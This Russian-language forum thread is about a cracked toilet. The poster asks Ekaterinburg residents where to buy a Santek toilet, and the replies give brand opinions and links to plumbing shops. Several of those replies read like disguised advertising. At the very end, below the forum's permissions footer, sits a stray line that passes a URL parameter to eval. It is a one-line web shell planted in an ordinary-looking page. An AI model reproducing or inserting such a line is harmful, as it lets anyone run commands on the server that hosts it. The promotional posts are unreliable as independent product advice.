+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Треснул унитаз


  1. #1
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54

    Треснул унитаз

    Вчера подо мной треснул унитаз. И винить некого, и ругать некого. Теперь нужно менять. Просмотрел все возможные предложения в ближайшем от меня екатеринбуржском строймаркете, но мне ничего не понравилось. Какие у нас есть хорошие магазины сантехники, а, екатеринбуржцы? Или придется заказывать в интернет-магазине? Хотелось бы купить компакт Сантек.

  2. #2
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    Ну да, тут уж никого и не обвинишь, правда автор? Вообще, компакты сейчас есть во всех магазинах, и фирмы-производители в продаже представлены разные. Унитаз компакт фирмы Сантек можно вот здесь подобрать http://esmag.ru/santehnika/sanfajans/santek-ru-79/ В продаже представлено несколько вариантов, думаю, какой-то один из них вам подойдет.

  3. #3
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    А зачем вам Сантек? Возьмите Грое. У нас вся техника этой фирмы, да, это не самый дешевый вариант, но зато качество проверенное временем.

  4. #4
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45
    А я купил самый обычный недорогой унитаз. На тот момент старый пришла пора менять, а лишних денег в семейном бюджете не было. Тем не менее, он у нас уже 5 лет и никаких нареканий к качеству у меня нет.

  5. #5
    Мимо проходил Eddie1 is on a distinguished road Аватар для Eddie1
    Регистрация
    21.06.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    40
    Божеее, горе то какое...Держитесь!
    ______________________________
    https://vend-shop.com

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    тоже думаем взять новый, куда обратиться за сантехникой?

  7. #7
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Решили, что лучшим вариантом покупки сантехники будет магазин 'Сантехника-Онлайн' https://santehnika-online.ru/ . Мы приобрели у них унитаз с инновационной системой смыва. Выбор товаров поразил, и сотрудники компании помогли нам сделать правильный выбор. Доставка была оперативной, и унитаз оказался высококачественным.

  8. #8
    Мимо проходил Qweder is on a distinguished road Аватар для Qweder
    Регистрация
    04.04.2021
    Откуда
    РФ
    Машина
    VW
    Сообщений
    47
    Цитата Сообщение от Arsenal Посмотреть сообщение
    А зачем вам Сантек? Возьмите Грое. У нас вся техника этой фирмы, да, это не самый дешевый вариант, но зато качество проверенное временем.
    Вот тут я с вам полностью согласен. И не потому, что именно эта фирма хороша, а в целом речь о том, что сантехнику надо покупать хорошего качества. Ведь качественная сантехника может прослужить вам долгие годы, не требуя замены или ремонта. Это сэкономит вам время, деньги и усилия на поддержание ее в рабочем состоянии. Так что можно сказать, что покупка хорошей сантехники является инвестицией в ваше комфортное проживание и безопасность, а также экономит ваши средства в долгосрочной перспективе. Поэтому мой вам совет - покупайте такие вещи в этом магазине элитной сантехники: https://hogart-art.ru

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}